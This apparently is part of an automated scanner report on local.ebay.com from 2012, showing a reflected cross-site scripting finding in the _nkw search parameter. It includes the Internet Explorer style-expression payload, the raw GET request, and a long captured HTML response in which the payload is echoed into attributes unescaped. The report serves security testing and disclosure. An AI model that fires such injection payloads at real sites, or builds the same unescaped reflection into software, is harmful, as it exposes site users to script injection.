</div></div><div style="margin-top:10px;font-size:11px;">Pricing &amp; inventory <a target="blank" href="/html/disclaimer.html">subject to Terms</a></div><div style="clear:both"></div></div></div></div></div></div><div id="map-prev" class="map"></div><div class="clr"></div></div><div class="srpLoad" id="srploading"><span>Loading </span><img src="/local/images.i?file=miniThrobber.gif"></div><div class="clr"></div></div><div class="footer" style="width:755px;"><div class="coreFooterLinks" id="glbfooter"><div><div id="rtm_html_1650"></div><div id="rtm_html_1651"></div></div><table border="0" cellpadding="0" cellspacing="0" width="100%"><tr><td class="g-pipe"><img src="http://q.ebaystatic.com/aw/pics/s.gif" height="10" width="1" alt=""><br><a href="http://www.ebayinc.com" _sp="m571.l2602">About eBay</a> | <a href="http://pages.ebay.com/securitycenter/index.html" _sp="m571.l2616">Security Center</a> | <a href="http://pages.ebay.com/buy/tools.html" _sp="m571.l2603">Buyer Tools</a> | <a href="http://pages.ebay.com/help/policies/overview.html" _sp="m571.l2604">Policies</a> | <a href="http://stores.ebay.com/" _sp="m571.l2605">Stores</a> | <a href="http://my.ebay.com/wishlistsearch" _sp="m571.l2898">eBay Wish list</a> | <a href="http://pages.ebay.com/sitemap.html" _sp="m571.l1625">Site Map</a> | <a href="http://viv.ebay.com/ws/eBayISAPI.dll?EbayTime" _sp="m571.l2606">eBay official time</a> | <a href="http://garden.ebay.com" _sp="m571.l1617">Preview new features</a> | <a href="http://qu.ebay.com/survey?srvName=globalheader+%28footer-US%29" id="gh-surveyLink" target="eBaySurvey" _sp="m571.l2628" rel="nofollow">Tell us what you think</a><form action="http://qu.ebay.com/survey?srvName=globalheader+%28footer-US%29" id="gh-surveyForm" method="post" target="eBaySurvey" class="gh-hdn g-hdn"><input name="domContent" value=""></form></td></tr><tr><td height="5"></td></tr><tr><td height="1" bgcolor="#dddddd" colspan="2"></td></tr><tr><td height="10"></td></tr><tr class="g-hlp" valign="top"><td class="g-nav coreFooterLegalNotice">Copyright .. 1995-2012 eBay Inc. All Rights Reserved. Designated trademarks and brands are the property of their respective owners. Use of this Web site constitutes acceptance of the eBay <a href="http://pages.ebay.com/help/policies/user-agreement.html?rt=nc" _sp="m571.l2612">User Agreement</a> and <a href="http://pages.ebay.com/help/policies/privacy-policy.html?rt=nc" _sp="m571.l2613">Privacy Policy</a>.<br><img src="http://q.ebaystatic.com/aw/pics/s.gif" height="20" alt=""></td></tr></table><div id="cobrandFooter"></div></div><script type="text/javascript">var _GlobalNavHeaderStatic=false, _GlobalNavHeaderCookieTracking=true, _GlobalNavHeaderSrcPageId=3872; var un="undefined";if(typeof(vjo)!=un && typeof(vjo.darwin)!=un && typeof(vjo.darwin.globalnav)!=un) vjo.darwin.globalnav.util.SGuid.writeSessionGuid("ab0f55cc1340a5e2c6324c52ff8bfe90");vjo.darwin.core.ebayheader.rover.FooterRover.roverService("http://rover.ebay.com/idmap/0?footer");; if(vjo && vjo.darwin && vjo.darwin.globalnav && vjo.darwin.globalnav.rtm && vjo.darwin.globalnav.rtm.GlobalHeaderRtmCall)vjo.darwin.globalnav.rtm.GlobalHeaderRtmCall.submitRTMCall("http://ir.ebaystatic.com/v4js/z/ur/grupfpzzoq4wjpypydpyjswhd.js");</script><script src="http://include.ebaystatic.com/js/e687/us/ebayfooter_cobrand_v4_e6871us.js"></script><!--@sgfp@ footerStyle=normal:CGI @egfp@--></div></div><div id="map-cont" class="map"><div id="map_canvas" style="height: 100%"></div></div><script type="text/javascript" src="http://maps.googleapis.com/maps/api/js?v=3.4&amp;client=gme-ebayinc1&amp;sensor=true"></script><script src="/local/localjs.js"></script><script type="text/javascript">var distances = new Array(0.5, 1, 2, 5, 10, 15, 20, 25, 50, 100);
var _sadis = document.getElementById("_flprad");
// locSliderGetElementByID: Cross-browser version of "document.getElementById()"
function locSliderGetElementById(element) {
   if (document.getElementById) element = document.getElementById(element);
   else if (document.all) element = document.all[element];
   else element = null;
   return element;
}

// locSliderLeft: Cross-browser version of "element.style.left"
function locSliderLeft(elmnt, pos) {
   if (!(elmnt = locSliderGetElementById(elmnt))) return 0;
   if (elmnt.style && (typeof(elmnt.style.left) == 'string')) {
       if (typeof(pos) == 'number') elmnt.style.left = pos + 'px';
       else {
           pos = parseInt(elmnt.style.left);
           if (isNaN(pos)) pos = 0;
       }
   }
   else if (elmnt.style && elmnt.style.pixelLeft) {
       if (typeof(pos) == 'number') elmnt.style.pixelLeft = pos;
       else pos = elmnt.style.pixelLeft;
   }
   return pos;
}

function setPos (distance) {
   var index = 0;
   /*for(var i=0,l=distances.length;i<l; i++){
       if(distance == distances[i]) {
           index = i;
           break;
       }
   }
   var pos = locSliderLeft("slider", (index*12.8)+6);
   document.getElementById("display").innerHTML = distance + " miles"; // put the new value in the slider display element
   document.getElementById("progress").style.width = (pos+30)+"px";*/
   _sadis.value = distance;
}
// slide: Handles the start of a slider move.
function slide(evnt, slider, left, right, display, progress, progressOffset) {
   if (!evnt) {
evnt = window.event;
   }
   sliderObj = locSliderGetElementById(slider);
   displayObj = locSliderGetElementById(display);
   progressObj = locSliderGetElementById(progress);
   progressObjOffset = progressOffset
   xLeft = left;
   xRight = right;
   pxLeft = locSliderLeft(sliderObj.id);
   xStart = evnt.screenX; // Horizontal mouse position at start of slide.
   mouseover = true;
   document.onmousemove = moveSlider; // Start the action if the mouse is dragged.
   document.onmouseup = sliderMouseUp; // Stop sliding.
}

// moveSlider: Handles slider and display while dragging
function moveSlider(evnt) {
   var evnt = (!evnt) ? window.event : evnt; // The mousemove event
   if (mouseover) { // Only if slider is dragged
       x = pxLeft + evnt.screenX - xStart; // Horizontal mouse position relative to allowed slider positions
       // Limit horizontal movement
       if (x > xRight) {
       x = xRight;
       }
       if (x < xLeft) {
        x = xLeft;
       }
       locSliderLeft(sliderObj.id, x); // move slider to new horizontal position
       distance = distances[Math.min(Math.round((x - xLeft) * distances.length / (xRight - xLeft)), distances.length - 1)]; // distance selection
       displayObj.innerHTML = distance + " miles"; // put the new value in the slider display element
       _sadis.value = distance;

       progressObj.style.width = (x + progressObjOffset - xLeft) + "px";
       
       return false
   }
   return
}
// sliderMouseup: Handles the mouseup event after moving a slider.
// Snaps the slider position to allowed/displayed value.
function sliderMouseUp() {
   mouseover = false // Stop the sliding.
   if (document.removeEventListener) { // Remove event listeners from 'document' (Mozilla).
       document.removeEventListener('mousemove', moveSlider, false)
       document.removeEventListener('mouseup', sliderMouseUp, false)
   }
   else if (document.detachEvent) { // Remove event listeners from 'document' (IE).
       document.detachEvent('onmousemove', moveSlider)
       document.detachEvent('onmouseup', sliderMouseUp)
   }
   //document.distanceForm.submit();
   submitDistance();
}

function submitDistance(){
   var t=this, zip = document.getElementById("_fpos"),zipName,disName;
   if(!zip || (zip && !(zipName=zip.getAttribute("name"))) || !_sadis ||(_sadis && !(disName=_sadis.getAttribute("name")))) return;
   var url = document.location.href;
   if(zipName == '_fpos') {
       var value = zip.value;
       url = vjo.dsf.utils.URL.addArg(url, '_fpos', value);
   }
   if(disName == '_flprad') {
       var value1 = _sadis.value;
       url = vjo.dsf.utils.URL.addArg(url, '_flprad', value1);
   }else {
       return;
   }        
   window.location = url;
   }

</script><script type="text/javascript">(function () {
var _r = vjo.Registry;
_r.put('0',new vjo.dsf.utils.SiteSpeed()); })();
(function(){
var _d=vjo.dsf.EventDispatcher;
var _r=vjo.Registry;
function $4(){return function(event){return this.init();};};_d.add('body','load',function(event){ setPos(25.0) });_d.add('body','load',function(event) { this.init(); },vjo.ebay.local.filter.Filter);_d.add('body','load',function(event) { this.initPriceFilter(); },vjo.ebay.local.srp.pricefilter.PriceFilter);_d.add('body','load',function(event) { this.init(); },vjo.ebay.local.categorylist.CategoryList);_d.add('body','load',function(event) { this.initFS(); },vjo.ebay.local.srp.filmstrip.Filmstrip);_d.add('body','load',$4(),vjo.ebay.local.pagination.Pagination);_d.add('body','load',function(event) { this.setLocalProducts({"item_1":[{"merchant_title":"Lowe's","merchant_id":"4483","lng":"-96.443819","store_link":null,"price":null,"logo":"http://static.milo.com/20111201145320/images/store_icons/flat_by_id/4483.png","lat":"32.743819"}],"item_2":[{"merchant_title":"Lowe's","merchant_id":"4483","lng":"-96.443819","store_link":null,"price":null,"logo":"http://static.milo.com/20111201145320/images/store_icons/flat_by_id/4483.png","lat":"32.743819"}]}); },vjo.ebay.local.srp.map.localpickup.LocalPickupMap);_d.add('body','load',$4(),vjo.ebay.local.pagination.Pagination);_d.add('body','load',function(event) { this.init("75217", "2"); },vjo.ebay.local.LocalLandingPage);})();
</script></body></html><!--RcmdId LocalDomain-localsch,RlogId jh%60djkbkbnmbvfd%60%3C%3Ds%7D%2Bpu56*%3A37dg%60b-134ac8b778c-->

1.3. http://local.ebay.com/local/localsch.html [_nkw parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://local.ebay.com
Path:   /local/localsch.html

Issue detail

The value of the _nkw request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b1756"style%3d"x%3aexpression(alert(1))"08ccc6c6ef4 was submitted in the _nkw parameter. This input was echoed as b1756"style="x:expression(alert(1))"08ccc6c6ef4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /local/localsch.html?_nkw=b1756"style%3d"x%3aexpression(alert(1))"08ccc6c6ef4&_fpos=75217&_inclfltr=1 HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)
Cache-Control: no-cache
Host: local.ebay.com
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Content-Length: 10






Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
RlogId: jh%60djkbkbnmbvfd%60%3C%3Dsm%2Bpu%28c5%3Ba6c0-134ac8a63e4
Cache-Control: no-cache
Pragma: no-cache
Set-Cookie: ebay=%5Ecv%3D15555%5E; Domain=.ebay.com; Path=/
Set-Cookie: s=CgAD4ACBPBpOmYWM4YTYzZTQxMzQwYTQ3YjMyYzFmZTUxZmZmZmU1MDUA7gCCTwaTpmh0dHA6Ly9sb2NhbC5lYmF5LmNvbTo4MC9sb2NhbC9sb2NhbHNjaC5odG1sP19ua3c9YjE3NTYic3R5bGU9Ing6ZXhwcmVzc2lvbihhbGVydCgxKSkiMDhjY2M2YzZlZjQmX2Zwb3M9NzUyMTcmX2ZscHJhZD0yNS4wJl9jYXRpZD0D89vH; Domain=.ebay.com; Path=/
Set-Cookie: nonsession=CgADKACBYa0OmYWM4YTYzZTQxMzQwYTQ3YjMyYzFmZTUxZmZmZmU1MDUAywABTwVJLjFE+yDv; Domain=.ebay.com; Expires=Fri, 04-Jan-2013 06:24:38 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Content-Length: 22563
Date: Thu, 05 Jan 2012 06:24:38 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><title>eBay - b1756"style="x:expression(alert(1))"08ccc6c6ef4</title><link href="http://www.ebay.com/favicon.ico" rel="icon" type="image/ico"><link href="/local/localcss.css" rel="stylesheet" type="text/css"></head><body id="body"><!--[if lt IE 8 ]> <style type="text/css"> .srpbt{position:relative;width:1%;margin:10px 0 0} .srpi {width:411px} .srpi input{width:295px;} </style><![endif]--><div id="ff-body" class="bdy"><script type="text/javascript">var _GlobalNavHeaderUtf8Encoding=true;</script><script type="text/javascript">var includeHost="http://include.ebaystatic.com/";</script><link rel="stylesheet" type="text/css" href="http://ir.ebaystatic.com/v4css/z/2s/3zhykpa5ca0zthsnrhjg02hpi.css"><script src="http://ir.ebaystatic.com/v4js/z/yo/qicc5beyw2zejm0u4bus2lv3u.js"></script><script type="text/javascript" src="http://ir.ebaystatic.com/v4js/z/qz/kjtciulcyi4gtcfxjs5s2k33m.js"></script><!--[if lt IE 7 ]><div id='gnheader' class='gh-w ie6'><![endif]--><!--[if IE 7]><div id='gnheader' class='gh-w ie7'><![endif]--><!--[if (gt IE 7)|!(IE)]><!--><div id="gnheader" class="gh-w"><!--<![endif]--><a href="#mainContent" rel="nofollow" class="g-hdn">Skip to main content</a><div><div class="gh-eb"><div class="gh-emn"><div class="gh-hid"></div><div class="gh-mn"><span class="gh-fst"><a id="MyEbay" href="http://my.ebay.com/ws/eBayISAPI.dll?MyEbay&amp;gbh=1" _sp="m570.l2919">My eBay</a></span><a id="Sell" href="http://cgi5.ebay.com/ws/eBayISAPI.dll?aidZ153=&amp;MfcISAPICommand=SellHub3" _sp="m570.l1528">Sell</a><a id="Community" href="http://community.ebay.com" _sp="m570.l1540">Community</a><span class="gh-nho"></span><a id="Help" href="http://ocs.ebay.com/ws/eBayISAPI.dll?CustomerSupport" _sp="m570.l1545">Customer Support</a><span class="gh-nho"><span class="gh-sc" style="display:none" id="GH_Cart"><a href="http://payments.ebay.com/ws/eBayISAPI.dll?ShopCart&amp;ssPageName=CART:HDR"><img src="http://p.ebaystatic.com/aw/pics/buy/cart/iconCart000.gif" alt="Your shopping cart" border="0" height="24" width="31"></img>Cart</a></span><script type="text/javascript">vjo.darwin.globalnav.shoppingcart.ShoppingCart.RefreshCart()</script></span></div></div><form id="headerSearch" name="headerSearch" method="get" action="http://www.ebay.com/sch/i.html"><input type="hidden" name="_from" value="R40"><input type="hidden" name="_trksid" value="m570.l2736"><span class="gh-esb"><label for="_nkw" class="g-hdn">Enter your search keyword</label><input type="text" class="gh-txt" name="_nkw" id="_nkw"><a><input type="submit" value="Go" class="gh-go"></a></span></form></div><div class="gh-log"><span class="gh-lg"><a id="EbayLogo" href="http://www.ebay.com" _sp="m570.l2586"><img src="http://p.ebaystatic.com/aw/pics/logos/logoEbay_x45.gif" alt="eBay" border="0" height="45" width="110"></img></a></span><span class="gh-wrap"><span class="gh-shim"></span><span class="greeting gh-ui"><script type="text/javascript">vjo.darwin.core.greetings.VjGreetingsClient.writePersonalHeader("Sign in", "https://signin.ebay.com/ws/eBayISAPI.dll?SignIn", "register", "https://scgi.ebay.com/ws/eBayISAPI.dll?RegisterEnterInfo", "Sign out", "https://signin.ebay.com/ws/eBayISAPI.dll?SignIn", "Welcome! ##1## or ##2##.", "Hi, <b>##1##<\/b>! (##2##)", "Hi, <b>##1##<\/b>! (<a href=\"https://signin.ebay.com/ws/eBayISAPI.dll?SignIn\" _sp=\"m570.l2620\">Not you<\/a>?)", "Hello! <a href=\"https://signin.ebay.com/ws/eBayISAPI.dll?SignIn\" _sp=\"m570.l1524\">Sign in/out<\/a>.", "<img src=\"http://p.ebaystatic.com/aw/pics/icon/iconWarnRed_16x16.gif\" height=\"16\" width=\"16\" alt=\"Alert\">", "<span id=\"bta\">##1##<\/span>", " | You have <a href=\"http://my.ebay.com/ws/eBayISAPI.dll?MyEbay&amp;gbh=1&amp;ssPageName=STRK:ME:LNLK&amp;CurrentPage=MyeBayMyMessages\" _sp=\"m570.l2623\">##1## alert<\/a>.", " | You have <a href=\"http://my.ebay.com/ws/eBayISAPI.dll?MyEbay&amp;gbh=1&amp;ssPageName=STRK:ME:LNLK&amp;CurrentPage=MyeBayMyMessages\" _sp=\"m570.l2623\">##1## alerts<\/a>.", "1", "", true)</script></span><span class="coupon rebate" id="rbt" style="display:none"><img src="http://p.ebaystatic.com/aw/pics/promo/magic/pmoGleam10_150x23.gif" alt="Coupon" border="0" height="23" width="150"></img><!--googleoff: all--> Must use Buy It Now and PayPal.<br/><a href="http://pages.ebay.com/cashbackoffer/terms.html" _sp="m570.l2735">See conditions</a><!--googleon: all--><script type="text/javascript">vjo.darwin.core.ebayheader.rebate.RebateBox.Refresh("rbt", "10", "<img src=\"http://q.ebaystatic.com/aw/pics/icons/iconRedeemCoupon20x20.gif\" alt=\"Coupon\" border=\"0\" height=\"20\" width=\"20\"><\/img><a href=\"http://my.ebay.com/ws/eBayISAPI.dll?MyeBay&amp;CurrentPage=MyeBayIncentives&amp;gbh=1\" _sp=\"m570.l2735\">You have coupons available<\/a>")</script></span></span></div><div></div></div><div class="gh-cl"></div><div><div class="gh-col"><b class="gh-c1"></b><b class="gh-c2"></b><b class="gh-c3"></b><b class="gh-c4"></b><b class="gh-c5"></b><b class="gh-c6"></b><b class="gh-c7"></b><div class="gh-clr"></div></div><div id="headerWrapper" class="gh-hbw"><div class="gh-hb"><div class="gh-mn"><a id="BrowseCategories" href="http://shop.ebay.com/allcategories/all-categories" _sp="m570.l1620">CATEGORIES</a><a id="chevron0" href="javascript:;" class="gh-ai"><b>&nbsp;</b></a><a id="EbayElectronics" title="Your shopping destination for the best selection and value in electronics and accessories" href="http://www.ebay.com/electronics/" _sp="m570.l2959">ELECTRONICS</a><span id="11450_sp"><a title="Your new destination for Clothing, Shoes &amp; Accessories on eBay." href="http://www.ebay.com/fashion/" _sp="m570.l2624">FASHION</a></span><a id="6000_sp" title="Buy and sell cars, trucks, vehicle parts, and accessories." href="http://www.motors.ebay.com/" _sp="m570.l2597">MOTORS</a><a id="EbayTickets" title="Tickets ... Sports, Concerts, Theater and More on eBay" href="http://www.ebay.com/tickets" _sp="m570.l1624">TICKETS</a><a id="172382_sp" title="Great items, deep discounts, and free shipping!" href="http://deals.ebay.com/" _sp="m570.l2625">DEALS</a><a id="EbayClassifieds" href="http://www.ebayclassifieds.com" _sp="m570.l2626">CLASSIFIEDS</a></div></div><div class="gh-lbh1"><div class="gh-rtm" style="display:inline-block;display:block;"><div id="rtm_html_876"></div></div></div><div class="gh-lbh2"><div class="gh-rtm" style="display:inline-block;display:block;"><div id="rtm_html_912"></div></div></div><div class="gh-lbh3"><div class="gh-rtm" style="display:inline-block;display:block;"><div id="rtm_html_433"></div></div></div><div class="gh-clr"></div></div><img src="http://rover.ebay.com/roversync/?site=0&amp;stg=1&amp;mpt=1325721178644" alt="" width="1" height="1"><script type="text/javascript">var svrGMT = 1325721178644;var scbps=0;var scPageName='GlobalHeader:3872';</script><div class="gh-ovr" id="gbh_ovl"><div class="gh-iovr"></div></div></div><a name="mainContent"></a></div><script src="http://include.ebaystatic.com/js/e723/us/ebaybase_v4_e7231us.js"></script><script src="http://include.ebaystatic.com/js/e681/us/ebaysup_e6811us.js"></script><script type="text/javascript">if(document.documentMode != 8 && document.compatMode != "CSS1Compat") ebay.oDocument._getControl("headerCommon")._exec("writeStyleSheet");</script><script type="text/javascript">vjo.Registry.put('bta', new vjo.darwin.globalnav.bta.BuyerTransactionAlert("bta", 60, 2, 2, "http://bmsgs.ebay.com/ws/eBayISAPI.dll?GetBuyerTransactionAlerts", "http://q.ebaystatic.com/aw/pics/", "http://cgi.ebay.com/ws/eBayISAPI.dll?ViewItem", "Watched Item ending soon!", "You've been outbid!", "You've received a Second Chance Offer", "You've received a Transaction Confirmation Request."));
vjo.darwin.globalnav.util.EventReg.aggregate(vjo.Registry._bta.onRefreshHdl());
vjo.darwin.globalnav.util.EventReg.browseCategories("BrowseCategoriesMenu", "http://include.ebaystatic.com/categoryjs/99/en_US_MAIN/category_99en_US_MAIN0.js");
vjo.darwin.globalnav.util.EventReg.impression("AI9IFZhI*");
</script><script type="text/javascript">vjo.darwin.globalnav.util.DoctypeSupport.init();</script><script type="text/javascript">var _oGlobalNavRTMInfo={};_oGlobalNavRTMInfo.aRTMPlacementData=[];_oGlobalNavRTMInfo.aRTMPlacementData=[{"ord":null,"maxWidth":"470","renderOnScroll":false,"rtmUrl":"http://srx.main.ebayrtm.com/rtm","userId":null,"htmlId":"rtm_html_433","GUid":null,"renderOnLoadAndScroll":false,"maxHeight":"22","pid":"433","isUserSignin":false,"renderOnLoadAndScrollSiteSpeed":false,"renderBeforeOnload":true},{"ord":null,"maxWidth":"160","renderOnScroll":false,"rtmUrl":"http://srx.main.ebayrtm.com/rtm","userId":null,"htmlId":"rtm_html_876","GUid":null,"renderOnLoadAndScroll":false,"maxHeight":"22","pid":"876","isUserSignin":false,"renderOnLoadAndScrollSiteSpeed":false,"renderBeforeOnload":true},{"ord":null,"maxWidth":"160","renderOnScroll":false,"rtmUrl":"http://srx.main.ebayrtm.com/rtm","userId":null,"htmlId":"rtm_html_912","GUid":null,"renderOnLoadAndScroll":false,"maxHeight":"22","pid":"912","isUserSignin":false,"renderOnLoadAndScrollSiteSpeed":false,"renderBeforeOnload":true},{"ord":null,"maxWidth":"470","renderOnScroll":false,"rtmUrl":"http://srx.main.ebayrtm.com/rtm","userId":null,"htmlId":"rtm_html_1650","GUid":null,"renderOnLoadAndScroll":false,"maxHeight":"22","pid":"1650","isUserSignin":false,"renderOnLoadAndScrollSiteSpeed":false,"renderBeforeOnload":false},{"ord":null,"maxWidth":"470","renderOnScroll":false,"rtmUrl":"http://srx.main.ebayrtm.com/rtm","userId":null,"htmlId":"rtm_html_1651","GUid":null,"renderOnLoadAndScroll":false,"maxHeight":"22","pid":"1651","isUserSignin":false,"renderOnLoadAndScrollSiteSpeed":false,"renderBeforeOnload":false}];</script><!--@sghp@ headerStyle=HALF:HOMEPAGE:CGI @eghp@--><div id="CenterPanel" class="cntr"><div id="LeftNav" class="lnav">
<!-- <fontT><h1 class="locs">Local Shopping</h1></fontT> -->
<a href="/local" class="locs">
   <img src="/local/images.i?file=LocalShoppingRibbon.png" />
   </a>
<!-- <form action="/localsch.html" name="distanceForm" id="distanceForm" class="sForm">-->
<div name="distanceForm" id="distanceForm" class="sForm">
   
           <input class="zipcode" autocomplete="off" name="_location" id="_location" value=", 75217">
           <div id="autocomplete" class="autocomplete"></div>
       
    <input type="hidden" id="_fpos" name="_fpos" value="75217">
        <input name="zipSub" type="button" value="" class="disSub">
        <div class="clr"></div>
<!-- <div class="cnz">
   <div id="citystate" style="float:left">, 75217</div>
   <div class="pd" style="float:left"></div>
   <div style="clear:both"></div>
   
</div> -->
<input type="hidden" id="zip" value="75217">
<!--<input name="_fpos" id="_fpos" value="75217" maxlength="5"></span> <input type="submit" value="" class="disSub">-->
   <div class="horizontal_track">
   <div class="horizontal_slit">
       <div id="progress" class="slider_bar" style="width:121.8px">&nbsp;</div>
   </div>
   <div class="simg" id="slider" style="left:91px" onmousedown="slide(event, 'slider', -16, 128, 'display', 'progress', 12);">
       <div id="display" class="disp" onmousedown="slide(event, 'slider', -16, 128, 'display', 'progress', 12);">25 miles</div>
       <input type="hidden" value="25" name="_flprad" id="_flprad">
       </div>
   </div>
   </div>
<div style="height:1px;background-color:#CCC;margin:15px 5px 5px"></div><div style="padding : 5px 0 0 10px"><a style="font-size:13px;font-weight:bold;color:#002398;display:none" href="/local/localsch.html?_nkw=b1756&quot;style=&quot;x:expression(alert(1))&quot;08ccc6c6ef4&amp;_fpos=75217&amp;_inclfltr=0" id="clr" name="clrfltr">Clear all refinements</a></div><div style="padding:5px 0 5px 10px;font-family:Arial;font-weight:bold;font-size:12px;color:#333333"><h4 style=" margin: 0 0 10px;">By Price :</h4><div id="pFil"><span style="padding-right:5px;">$</span><input type="text" id="_sp" name="_sp" size="3" value="" style="margin:0;"><span style="padding: 0 5px;">to $</span><input id="_ep" name="_ep" type="text" size="3" value="" style="margin:0 3px 0 0;"><input type="button" class="disSub disSubDis" name="bP" id="bP" value=""></div></div><div style="height:1px;background-color:#CCC;margin:15px 5px 5px"></div><div><div class="ifltr-W">
   <h4 class="ifltr-hdr">Include only</h4>
   
   <div class="ifltr-lst">
       <ul>
           <li>
               <input type="radio" name="inclFltr" value="1">
               <span>Local Retailers</span>
           </li>
           <li>
               <input type="radio" name="inclFltr" checked=checked value="0">
               <span>eBay Sellers</span>
           </li>            
       </ul>
   </div>
</div></div><div style="height:1px;background-color:#CCC;margin:15px 5px 5px"></div><div></div><div style="height:1px;background-color:#CCC;margin:15px 5px 5px"></div><div style="padding:5px 0 10px 20px"><a href="http://www.ebay.com/sch/i.html?_nkw=b1756&quot;style=&quot;x:expression(alert(1))&quot;08ccc6c6ef4" target="blank" style="font-size:13px;font-weight:bold;color:#003dac;">View results on ebay.com</a></div></div><div class="cont"><div style="float:left"><div>

<div class="srpbx1">
       <form action="/local/localsch.html" method="get" onsubmit="return vjo.ebay.local.LocalLandingPage.onSubmit();">
           <div>
               <div style="float:right">
                   <input type="submit" id="but" value="Search" class="srpbt" tabindex="2" />
               </div>
               <div class="srpi srchbox">
                   <input type="text" id="txt" name="_nkw" placeholder="Search locally " value='b1756"style="x:expression(alert(1))"08ccc6c6ef4' autofocus="autofocus" autocomplete="off" tabindex="1" />
               </div>
               
               
               
               
                   <input type="hidden" value="75217" name="_fpos">
               
               
                   <input type="hidden" value="1" name="_inclfltr">
               
               
                   <input type="hidden" value="b1756"style="x:expression(alert(1))"08ccc6c6ef4" name="_odkw">
                   
                                                                                   
           </div>
       </form>
</div></div><div id="localResults" class="results"><div id="LocalProductResultSet" class="bgshd"><div><div style="padding:5px; background-color:#F5F5F5" tt="281"><div></div><div style="clear:both"></div><div style="padding:10px 0"><div class="smm-s smm-e"><div class="sm-imc smm-imc"><b class="g-hdn">error</b><div class="smm-cnt">Your search returned 0 results</div></div></div></div></div></div><div></div><div></div></div></div></div><div id="map-prev" class="map"></div><div class="clr"></div></div><div class="srpLoad" id="srploading"><span>Loading </span><img src="/local/images.i?file=miniThrobber.gif"></div><div class="clr"></div></div><div class="footer" style="width:755px;"><div class="coreFooterLinks" id="glbfooter"><div><div id="rtm_html_1650"></div><div id="rtm_html_1651"></div></div><table border="0" cellpadding="0" cellspacing="0" width="100%"><tr><td class="g-pipe"><img src="http://q.ebaystatic.com/aw/pics/s.gif" height="10" width="1" alt=""><br><a href="http://www.ebayinc.com" _sp="m571.l2602">About eBay</a> | <a href="http://pages.ebay.com/securitycenter/index.html" _sp="m571.l2616">Security Center</a> | <a href="http://pages.ebay.com/buy/tools.html" _sp="m571.l2603">Buyer Tools</a> | <a href="http://pages.ebay.com/help/policies/overview.html" _sp="m571.l2604">Policies</a> | <a href="http://stores.ebay.com/" _sp="m571.l2605">Stores</a> | <a href="http://my.ebay.com/wishlistsearch" _sp="m571.l2898">eBay Wish list</a> | <a href="http://pages.ebay.com/sitemap.html" _sp="m571.l1625">Site Map</a> | <a href="http://viv.ebay.com/ws/eBayISAPI.dll?EbayTime" _sp="m571.l2606">eBay official time</a> | <a href="http://garden.ebay.com" _sp="m571.l1617">Preview new features</a> | <a href="http://qu.ebay.com/survey?srvName=globalheader+%28footer-US%29" id="gh-surveyLink" target="eBaySurvey" _sp="m571.l2628" rel="nofollow">Tell us what you think</a><form action="http://qu.ebay.com/survey?srvName=globalheader+%28footer-US%29" id="gh-surveyForm" method="post" target="eBaySurvey" class="gh-hdn g-hdn"><input name="domContent" value=""></form></td></tr><tr><td height="5"></td></tr><tr><td height="1" bgcolor="#dddddd" colspan="2"></td></tr><tr><td height="10"></td></tr><tr class="g-hlp" valign="top"><td class="g-nav coreFooterLegalNotice">Copyright .. 1995-2012 eBay Inc. All Rights Reserved. Designated trademarks and brands are the property of their respective owners. Use of this Web site constitutes acceptance of the eBay <a href="http://pages.ebay.com/help/policies/user-agreement.html?rt=nc" _sp="m571.l2612">User Agreement</a> and <a href="http://pages.ebay.com/help/policies/privacy-policy.html?rt=nc" _sp="m571.l2613">Privacy Policy</a>.<br><img src="http://q.ebaystatic.com/aw/pics/s.gif" height="20" alt=""></td></tr></table><div id="cobrandFooter"></div></div><script type="text/javascript">var _GlobalNavHeaderStatic=false, _GlobalNavHeaderCookieTracking=true, _GlobalNavHeaderSrcPageId=3872; var un="undefined";if(typeof(vjo)!=un && typeof(vjo.darwin)!=un && typeof(vjo.darwin.globalnav)!=un) vjo.darwin.globalnav.util.SGuid.writeSessionGuid("ab23d4ae1340a03664168136ff4b32e9");vjo.darwin.core.ebayheader.rover.FooterRover.roverService("http://rover.ebay.com/idmap/0?footer");; if(vjo && vjo.darwin && vjo.darwin.globalnav && vjo.darwin.globalnav.rtm && vjo.darwin.globalnav.rtm.GlobalHeaderRtmCall)vjo.darwin.globalnav.rtm.GlobalHeaderRtmCall.submitRTMCall("http://ir.ebaystatic.com/v4js/z/ur/grupfpzzoq4wjpypydpyjswhd.js");</script><script src="http://include.ebaystatic.com/js/e687/us/ebayfooter_cobrand_v4_e6871us.js"></script><!--@sgfp@ footerStyle=normal:CGI @egfp@--></div></div><div id="map-cont" class="map"><div id="map_canvas" style="height:100%"></div></div><script type="text/javascript" src="http://maps.googleapis.com/maps/api/js?v=3.4&amp;client=gme-ebayinc1&amp;sensor=true"></script><script src="/local/localjs.js"></script><script type="text/javascript">var distances = new Array(0.5, 1, 2, 5, 10, 15, 20, 25, 50, 100);
var _sadis = document.getElementById("_flprad");
// locSliderGetElementByID: Cross-browser version of "document.getElementById()"
function locSliderGetElementById(element) {
   if (document.getElementById) element = document.getElementById(element);
   else if (document.all) element = document.all[element];
   else element = null;
   return element;
}

// locSliderLeft: Cross-browser version of "element.style.left"
function locSliderLeft(elmnt, pos) {
   if (!(elmnt = locSliderGetElementById(elmnt))) return 0;
   if (elmnt.style && (typeof(elmnt.style.left) == 'string')) {
       if (typeof(pos) == 'number') elmnt.style.left = pos + 'px';
       else {
           pos = parseInt(elmnt.style.left);
           if (isNaN(pos)) pos = 0;
       }
   }
   else if (elmnt.style && elmnt.style.pixelLeft) {
       if (typeof(pos) == 'number') elmnt.style.pixelLeft = pos;
       else pos = elmnt.style.pixelLeft;
   }
   return pos;
}

function setPos (distance) {
   var index = 0;
   /*for(var i=0,l=distances.length;i<l; i++){
       if(distance == distances[i]) {
           index = i;
           break;
       }
   }
